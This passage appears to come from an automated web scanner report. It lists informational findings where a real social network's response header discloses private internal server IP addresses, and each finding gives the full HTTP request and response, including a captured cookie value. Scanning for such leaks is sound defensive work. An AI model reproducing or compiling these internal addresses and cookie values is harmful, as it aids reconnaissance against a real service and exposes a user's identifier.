GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A415%2C%22baseline_elapsed%22%3A415%7D&asyncSignal=1593 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3f9538728%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff399bdf3c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.229.64
X-Cnection: close
Date: Thu, 16 Jun 2011 11:54:32 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.506. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.127.61

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1876%2C%22baseline_elapsed%22%3A1870%7D&asyncSignal=6728 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.127.61
X-Cnection: close
Date: Thu, 16 Jun 2011 18:06:43 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.507. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.238.75

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1604%2C%22baseline_elapsed%22%3A1604%7D&asyncSignal=9256 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.42.238.75
X-Cnection: close
Date: Thu, 16 Jun 2011 12:09:57 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.508. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.230.43

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1520%2C%22baseline_elapsed%22%3A1520%7D&asyncSignal=558 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2cfe77904%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff19ecc276%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.230.43
X-Cnection: close
Date: Thu, 16 Jun 2011 16:18:05 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.509. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.153.43

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1492%2C%22baseline_elapsed%22%3A1492%7D&asyncSignal=8111 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27367b4d8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f3e598%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.153.43
X-Cnection: close
Date: Thu, 16 Jun 2011 17:40:49 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.510. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.197.63

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1498%2C%22baseline_elapsed%22%3A1498%7D&asyncSignal=7610 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8c21b14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f3e598%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.197.63
X-Cnection: close
Date: Thu, 16 Jun 2011 17:40:49 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.511. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.16.130

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1531%2C%22baseline_elapsed%22%3A1559%7D&asyncSignal=673 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.27.16.130
X-Cnection: close
Date: Thu, 16 Jun 2011 13:58:32 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.512. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.225.53

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A177%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A187%2C%22baseline_elapsed%22%3A384%7D&asyncSignal=8372 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3865fdfa%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3575fe8e%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.225.53
X-Cnection: close
Date: Thu, 16 Jun 2011 15:00:35 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.513. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.50.127

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A637%2C%22baseline_elapsed%22%3A784%7D&asyncSignal=2439 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3148362f8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb889e7%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.136.50.127
X-Cnection: close
Date: Thu, 16 Jun 2011 13:27:37 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.514. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.137.46

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1553%2C%22baseline_elapsed%22%3A1553%7D&asyncSignal=4841 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.137.46
X-Cnection: close
Date: Thu, 16 Jun 2011 15:57:24 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.515. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.82.52

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1482%2C%22baseline_elapsed%22%3A1511%7D&asyncSignal=2402 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.82.52
X-Cnection: close
Date: Thu, 16 Jun 2011 13:32:42 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.516. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.183.59

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1280%2C%22baseline_elapsed%22%3A1186%7D&asyncSignal=9393 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe01abf48%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff284b08ca8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.183.59
X-Cnection: close
Date: Thu, 16 Jun 2011 13:06:54 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.517. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.210.52

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1839%2C%22baseline_elapsed%22%3A1839%7D&asyncSignal=4221 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.210.52
X-Cnection: close
Date: Thu, 16 Jun 2011 18:01:30 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.518. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.196.36

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A529%2C%22baseline_elapsed%22%3A435%7D&asyncSignal=4958 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b9d98ad%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff284b08ca8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.196.36
X-Cnection: close
Date: Thu, 16 Jun 2011 13:06:53 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.519. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.105.58

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A862%2C%22baseline_elapsed%22%3A862%7D&asyncSignal=8889 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df73ab0edc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3859f0824%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.105.58
X-Cnection: close
Date: Thu, 16 Jun 2011 12:15:13 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.520. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.177.33

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1207%2C%22baseline_elapsed%22%3A1144%7D&asyncSignal=7823 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27ca24ecc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43418837&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.177.33
X-Cnection: close
Date: Thu, 16 Jun 2011 11:25:12 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

